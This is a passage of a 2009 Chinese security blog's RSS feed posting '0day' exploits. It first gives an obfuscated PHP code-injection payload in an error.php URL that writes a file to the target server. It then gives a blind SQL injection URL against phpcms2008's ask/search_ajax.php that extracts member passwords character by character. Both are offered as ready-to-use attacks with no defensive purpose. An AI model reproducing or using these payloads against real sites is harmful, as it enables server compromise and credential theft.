hxxp://www.xxx.com/error.php?errid=1&amp;errtitle=&lt;?fputs(fopen(chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59).chr(63).chr(62));?&gt;<br />
这样你在访问一次hxxp://www.xxx.com/data/error.php后将得到hxxp://www.xxx.com/data/wolvez.php的测试文件<br />
内容为&lt;?phpinfo():?&gt;lol</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=939&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_939" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ishowmusic-0day.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>phpcms2008-0day ask/search_ajax.php注入漏洞</title>
		<link>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html</link>
		<comments>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html#comments</comments>
		<pubDate>Mon, 16 Mar 2009 00:49:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=855</guid>
		<description><![CDATA[作者：nuke
受影响程序： phpcms2008 gbk
漏洞文件：ask/search_ajax.php
测试方法：
ask/search_ajax.php?q=s%E6&#8242;/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0&#215;706870636D73)&#62;52%23
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_690" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/黑客"><img class="size-full wp-image-690" title="安全" src="http://www.p9.net.cn/wp-content/uploads/2009/03/an.png" alt="安全" width="90" height="100" /></a><p class="wp-caption-text">安全</p></div>
<p>作者：nuke<br />
受影响程序： phpcms2008 gbk<br />
漏洞文件：ask/search_ajax.php<br />
测试方法：<br />
ask/search_ajax.php?q=s%E6&#8242;/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0&#215;706870636D73)&gt;52%23</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=855&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_855" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/phpcms2008-0day-ask-search_ajax-php.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

